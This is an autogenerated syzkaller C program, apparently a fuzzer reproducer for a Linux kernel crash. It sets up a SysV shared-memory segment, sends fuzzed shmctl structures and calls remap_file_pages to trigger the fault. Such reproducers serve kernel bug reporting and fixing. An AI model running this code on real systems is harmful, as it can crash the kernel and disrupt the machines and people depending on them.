syzkaller program to reproduce a crash

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_shmget
#define SYS_shmget 29
#endif
#ifndef SYS_shmat
#define SYS_shmat 30
#endif
#ifndef SYS_shmctl
#define SYS_shmctl 31
#endif
#ifndef SYS_remap_file_pages
#define SYS_remap_file_pages 216
#endif

long r[73];

int main()
{
	memset(r, -1, sizeof(r));
	r[0] = syscall(SYS_mmap, 0x20000000ul, 0x2000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
	r[1] = syscall(SYS_shmget, 0x5ul, 0x2000ul, 0x200ul, 0x20b03000ul, 0, 0);
	r[2] = syscall(SYS_shmat, r[1], 0x20b03000ul, 0x6000ul, 0, 0, 0);
	*(uint32_t*)0x20000e4b = (uint32_t)0x3;
	*(uint32_t*)0x20000e4f = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x20000e53 = (uint32_t)0x0;
	*(uint32_t*)0x20000e57 = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x20000e5b = (uint32_t)0xffffffffffffffff;
	*(uint16_t*)0x20000e5f = (uint16_t)0x1;
	*(uint16_t*)0x20000e61 = (uint16_t)0xfa;
	*(uint64_t*)0x20000e63 = (uint64_t)0x3;
	*(uint64_t*)0x20000e6b = (uint64_t)0xee;
	*(uint64_t*)0x20000e73 = (uint64_t)0x10000;
	*(uint64_t*)0x20000e7b = (uint64_t)0x6520;
	*(uint64_t*)0x20000e83 = (uint64_t)0x5;
	*(uint32_t*)0x20000e8b = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x20000e8f = (uint32_t)0x0;
	*(uint64_t*)0x20000e93 = (uint64_t)0x0;
	r[18] = syscall(SYS_shmctl, r[1], 0x3ul, 0x20000e4bul, 0, 0, 0);
	if (r[18] != -1)
		r[19] = *(uint32_t*)0x20000e4f;
	*(uint32_t*)0x2000028f = (uint32_t)0x1000;
	*(uint32_t*)0x20000293 = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x20000297 = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x2000029b = (uint32_t)0x0;
	*(uint32_t*)0x2000029f = (uint32_t)0x0;
	*(uint16_t*)0x200002a3 = (uint16_t)0x7;
	*(uint16_t*)0x200002a5 = (uint16_t)0x100000000;
	*(uint64_t*)0x200002a7 = (uint64_t)0x5;
	*(uint64_t*)0x200002af = (uint64_t)0x6;
	*(uint64_t*)0x200002b7 = (uint64_t)0x0;
	*(uint64_t*)0x200002bf = (uint64_t)0x2;
	*(uint64_t*)0x200002c7 = (uint64_t)0x4;
	*(uint32_t*)0x200002cf = (uint32_t)0x0;
	*(uint32_t*)0x200002d3 = (uint32_t)0xffffffffffffffff;
	*(uint64_t*)0x200002d7 = (uint64_t)0xef0;
	r[35] = syscall(SYS_shmctl, r[1], 0xeul, 0x2000028ful, 0, 0, 0);
	if (r[35] != -1)
		r[36] = *(uint32_t*)0x20000293;
	if (r[35] != -1)
		r[37] = *(uint32_t*)0x20000297;
	if (r[35] != -1)
		r[38] = *(uint32_t*)0x2000029f;
	if (r[35] != -1)
		r[39] = *(uint32_t*)0x200002cf;
	*(uint32_t*)0x20001fb0 = (uint32_t)0x80;
	*(uint32_t*)0x20001fb4 = r[19];
	*(uint32_t*)0x20001fb8 = r[38];
	*(uint32_t*)0x20001fbc = r[36];
	*(uint32_t*)0x20001fc0 = r[37];
	*(uint16_t*)0x20001fc4 = (uint16_t)0x7;
	*(uint16_t*)0x20001fc6 = (uint16_t)0x10000;
	*(uint64_t*)0x20001fc8 = (uint64_t)0x5;
	*(uint64_t*)0x20001fd0 = (uint64_t)0xff;
	*(uint64_t*)0x20001fd8 = (uint64_t)0x80000000;
	*(uint64_t*)0x20001fe0 = (uint64_t)0x9;
	*(uint64_t*)0x20001fe8 = (uint64_t)0x3;
	*(uint32_t*)0x20001ff0 = r[39];
	*(uint32_t*)0x20001ff4 = (uint32_t)0xffffffffffffffff;
	*(uint64_t*)0x20001ff8 = (uint64_t)0x2;
	r[55] = syscall(SYS_shmctl, r[1], 0xcul, 0x20001fb0ul, 0, 0, 0);
	*(uint32_t*)0x20000fb0 = (uint32_t)0x1;
	*(uint32_t*)0x20000fb4 = (uint32_t)0x0;
	*(uint32_t*)0x20000fb8 = (uint32_t)0x0;
	*(uint32_t*)0x20000fbc = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x20000fc0 = (uint32_t)0x0;
	*(uint16_t*)0x20000fc4 = (uint16_t)0x1;
	*(uint16_t*)0x20000fc6 = (uint16_t)0x5;
	*(uint64_t*)0x20000fc8 = (uint64_t)0x5059;
	*(uint64_t*)0x20000fd0 = (uint64_t)0x3;
	*(uint64_t*)0x20000fd8 = (uint64_t)0x6301;
	*(uint64_t*)0x20000fe0 = (uint64_t)0x8001;
	*(uint64_t*)0x20000fe8 = (uint64_t)0xfffffffffffffffd;
	*(uint32_t*)0x20000ff0 = (uint32_t)0xffffffffffffffff;
	*(uint32_t*)0x20000ff4 = (uint32_t)0x0;
	*(uint64_t*)0x20000ff8 = (uint64_t)0x6;
	r[71] = syscall(SYS_shmctl, r[1], 0x0ul, 0x20000fb0ul, 0, 0, 0);
	r[72] = syscall(SYS_remap_file_pages, 0x20b03000ul, 0x2000ul, 0x0ul, 0x7ul, 0x21dd964cfba54855ul, 0);
	return 0;
}